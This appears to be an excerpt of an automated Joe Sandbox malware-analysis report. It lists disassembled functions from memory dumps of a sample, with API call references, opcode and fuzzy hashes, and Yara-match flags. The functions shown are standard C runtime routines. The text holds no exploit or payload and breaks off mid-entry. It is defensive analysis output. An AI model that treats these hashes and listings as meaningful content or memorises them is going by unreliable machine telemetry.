• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
• String ID:
• API String ID: 1202896665-0
• Opcode ID: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
• Instruction ID: 0d98e69d0512f29499375b1b223a36d4520ec3994eac90c636b6988e9ad91f04
• Opcode Fuzzy Hash: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
• Instruction Fuzzy Hash: 7311C472A041249BCB04EBA5DC46AEE7B74EF84358F10457FF911B72D1DB38AA01C7A9
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 004033EF
• std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
• int.LIBCPMT ref: 00403415
  • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
  • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
• std::locale::_Getfacet.LIBCPMT ref: 0040341E
• std::_Facet_Register.LIBCPMT ref: 0040344F
• std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040348B
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
• String ID:
• API String ID: 1202896665-0
• Opcode ID: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
• Instruction ID: b08fc69a2d58a520d61ed45628bf7838f6025f71e81aad9ede0327bacf9a49bc
• Opcode Fuzzy Hash: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
• Instruction Fuzzy Hash: 8F11B2329002249BCB05EFA4C845AEE7B74EF84319F10457EF811772D1DB789A00CB99
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 004035FA
• std::_Lockit::_Lockit.LIBCPMT ref: 00403609
• int.LIBCPMT ref: 00403620
  • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
  • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
• std::locale::_Getfacet.LIBCPMT ref: 00403629
• std::_Facet_Register.LIBCPMT ref: 0040365A
• std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
• __CxxThrowException@8.LIBVCRUNTIME ref: 00403696
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
• String ID:
• API String ID: 1202896665-0
• Opcode ID: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
• Instruction ID: 35ba7fbacb3ba011adbce412d2c2d1e287e189574cae76d7885ddda8e317074f
• Opcode Fuzzy Hash: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
• Instruction Fuzzy Hash: 3F11C432A001289BCB14EFA5C845AEE7B74AF84319F10457FF811773D1DB389A04CB99
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,05CF6BF7,00000001,00000001,?), ref: 05CF6A00
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,05CF6BF7,00000001,00000001,?,?,?,?), ref: 05CF6A86
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 05CF6B80
• __freea.LIBCMT ref: 05CF6B8D
  • Part of subcall function 05CF7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05CF7CDE
• __freea.LIBCMT ref: 05CF6B96
• __freea.LIBCMT ref: 05CF6BBB
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 5aa362d34f2587ad585337770af062121dfa53fa41768fff83d20bcf48d2f1bc
• Instruction ID: cffba6330ba24374cdeeb6899e5ebae6aec4285678cb07a6542ace62140b7604
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5aa362d34f2587ad585337770af062121dfa53fa41768fff83d20bcf48d2f1bc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A951D172700216ABDB658F60CC85EBB77AAEF44750B154A28FE06DB140DB74ED80E7A0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: d20e9699dbc1971cb5a568552f769a18d013c3a1758ac9be0fb612f4fcf7e9e2
• Instruction ID: 718bfb1be64fddbb13d287cf5bb67825c1c0e481ba6d94f2ea4f00e94f797b17
• Opcode Fuzzy Hash: d20e9699dbc1971cb5a568552f769a18d013c3a1758ac9be0fb612f4fcf7e9e2
• Instruction Fuzzy Hash: 5851FB32504205ABDF249B598C41EEF77A9AF49364F10421FF915962A1FB3DE9C0C66C
Uniqueness
• Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: 2ddc8343f9251e146c752777cf7602817e468c0d1f081b9786246e2890976293
• Instruction ID: 8b1b414adfa1cdeffa478bbc86eaf2eceb2a752af8a00dcaca6802dc13f82917
• Opcode Fuzzy Hash: 2ddc8343f9251e146c752777cf7602817e468c0d1f081b9786246e2890976293
• Instruction Fuzzy Hash: DA514932A04605FBDFA59B69CC88EBE77B9FF49320F180A19EA1596281DB35D600D760
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetLastError.KERNEL32(?,?,0040C9AC,0040A25B), ref: 0040C9C3
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D1
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9EA
• SetLastError.KERNEL32(00000000,?,0040C9AC,0040A25B), ref: 0040CA3C
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 9ec8e2a5af9cecc2b331547669bdca73f67e442984506367ed98352285f45261
• Instruction ID: 4d2dab335d40ef71c1f126db0958835d547db160ba3e5df8986dc94b5f1501a5
• Opcode Fuzzy Hash: 9ec8e2a5af9cecc2b331547669bdca73f67e442984506367ed98352285f45261
• Instruction Fuzzy Hash: 5001C072609619AEE63857B5BCC5B2B3665DB01378720033FF220B02F1EF694C06558C
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetLastError.KERNEL32(?,?,05CECC13,05CEA4C2), ref: 05CECC2A
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 05CECC38
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 05CECC51
• SetLastError.KERNEL32(00000000,?,05CECC13,05CEA4C2), ref: 05CECCA3
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 0582111726bc4582c636df92e8fe045c6ff17bb16724062b7f54ac71f9743851
• Instruction ID: 0231809b779f5e7754000b44290595f67ae671078828ba9ae63deae212aac0b3
• Opcode Fuzzy Hash: 0582111726bc4582c636df92e8fe045c6ff17bb16724062b7f54ac71f9743851
• Instruction Fuzzy Hash: 0301843230A7255EA6292775BD8CA6B3B65EB01A747202E3DE736A50F0EF614C016688
Uniqueness
• Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
• Instruction ID: ed1cfbe94671cc1e241a5e305b234748cf7dab698c9013e935629a888f8688e1
• Opcode Fuzzy Hash: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
• Instruction Fuzzy Hash: 1CF0A431784B1066C6227B36BC0AFDF26299FC1765B27062FF518A2291EF2CD882815D
Uniqueness
• Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
• Instruction ID: da109318c6c7a236c470b0a6ec28e5a116dfd8818924153c7ecf91788f30cf2d
• Opcode Fuzzy Hash: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
• Instruction Fuzzy Hash: 7FF0A4397486127AC6A223797C0CF6F2566EBC17A1F650E24F715E2290EE2489825365
Uniqueness
• Uniqueness Score: -1.00%
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
• GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000), ref: 0041729F
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                  • String ID: -@
                                                                                                                                                                                                                                  • API String ID: 3177248105-2564449678
                                                                                                                                                                                                                                  • Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                  • Instruction ID: 8997a9a2b537593604dca6541f5acb5d3abab1905c8fb23eed40c845f27096e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED01473634A2239BC7314B68AC44A9B3BA8BF117607114675F90AE3240DB34D843C6EC
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                  • std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                  • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                                  • Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                  • Instruction ID: 07e54f61a89a03d5a6d9a7cf2ef478e5e050e13e4079476904521aa99984b06a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78F0C26290035C63DB10B9659C42FEA7B989F09358F24C03BFD45761E1D77D5A04C6ED
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002), ref: 00413A8C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
                                                                                                                                                                                                                                  • Instruction ID: a34188c843a8f46fdd92a2bf3fbb0ddbd7449eedd0cf1b17e067f3e400b11719
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CF0A930B01218BBDB109F50DC05B9E7F78EF44752F404069F809A2290DF344E45C79C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction ID: 9cd28828fb54a95b18f1d3d04b552151bab261da8883c7926ca586bf812e9daa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA71B1359022569BCB218B59C884AFFBB75EF41350F14422BE914A7380E7789CE1C7EA
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction ID: fff938abde276f3a4dd0a1117ac686cc2847eb142098f1199130bb28231f7e0b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0971C479A15217AFCB61CF55CC84ABFFB76FF41350F244929E61A6B280D7708A41C7A0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004146D7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004146EE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041470D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414728
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041473F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                                                                                                                  • Opcode ID: 088220e492716788e8e6bec049d5caff652ce20ed0a84fe148ba2189e9e303d7
• Instruction ID: c2206efc5f66e5100cf0e8c7e25606760de7fe79bb98949094d9bf3f90d27d39
• Opcode Fuzzy Hash: 088220e492716788e8e6bec049d5caff652ce20ed0a84fe148ba2189e9e303d7
• Instruction Fuzzy Hash: 6B51D471A00304AFDB20DF65D881BAA77F4EF99728F15056EE809D7690E739E981CB48
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
• Instruction ID: dd2835c9885c6aa3f8cce8b3b5d5cac91b3775441f4e2c90be38872ca8706c4a
• Opcode Fuzzy Hash: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
• Instruction Fuzzy Hash: A341D332E00710EFDB15DFA9C880A9AB7B1EF89314B1545AAE515EB382D735AD41CB84
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00411992,?,00000000,?,00000001,?,?,00000001,00411992,?), ref: 0041B476
• __alloca_probe_16.LIBCMT ref: 0041B4AE
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B4FF
• GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DE7,?), ref: 0041B511
• __freea.LIBCMT ref: 0041B51A
  • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
• String ID:
• API String ID: 313313983-0
• Opcode ID: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
• Instruction ID: e6e93543b041c594e81487d5909f541e573430f1ea5015fd54542e6688d1641d
• Opcode Fuzzy Hash: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
• Instruction Fuzzy Hash: E931AC32A0021AABDB249F65DC41DEF7BA5EF40318F04412AFC04D6291EB39CD95CB94
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0041E53C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E55F
  • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E585
• _free.LIBCMT ref: 0041E598
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E5A7
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: fd9cb40695fd0089d65125f9c917d3271f033025ad03b813fa21ea85d7d026fb
• Instruction ID: da1d7805988d3e4f29d48d7d5147bf5fd0936ba562dc79f78d94e6ba61cfb34a
• Opcode Fuzzy Hash: fd9cb40695fd0089d65125f9c917d3271f033025ad03b813fa21ea85d7d026fb
• Instruction Fuzzy Hash: 4901D8766027207F23211AB75C48DFF6E6EDEC6B98355012EFD08D6200FE688D429178
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 05CFE7A3
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 05CFE7C6
  • Part of subcall function 05CF7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05CF7CDE
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 05CFE7EC
• _free.LIBCMT ref: 05CFE7FF
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 05CFE80E
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: 38dd7213b9bcb45c1147e39a21c5c15d2d7fc2ddc2b943de6988b854aed99f6c
• Instruction ID: 52facd71f7fde047368477b84c048f74ffdf0056b855fb3e5f069d9476927052
• Opcode Fuzzy Hash: 38dd7213b9bcb45c1147e39a21c5c15d2d7fc2ddc2b943de6988b854aed99f6c
• Instruction Fuzzy Hash: C401B1727066617F27F126AA6C8CC7F797DEAC29A03150529FB05D2120EE618D0282B5
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
• _free.LIBCMT ref: 00416DD7
• _free.LIBCMT ref: 00416DFE
• SetLastError.KERNEL32(00000000), ref: 00416E0B
• SetLastError.KERNEL32(00000000), ref: 00416E14
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
• Instruction ID: e46c26cc5ac3d344e97fba90109cbcfbfaa945fe7b6790f8bafc9466d81cae3c
• Opcode Fuzzy Hash: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
• Instruction Fuzzy Hash: CA01D6367447106A82217676BC85EEB2629DBC5764763027FF515A2282EF2CCC86515C
Uniqueness
Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 0041EEB6
  • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
  • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
• _free.LIBCMT ref: 0041EEC8
• _free.LIBCMT ref: 0041EEDA
• _free.LIBCMT ref: 0041EEEC
• _free.LIBCMT ref: 0041EEFE
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
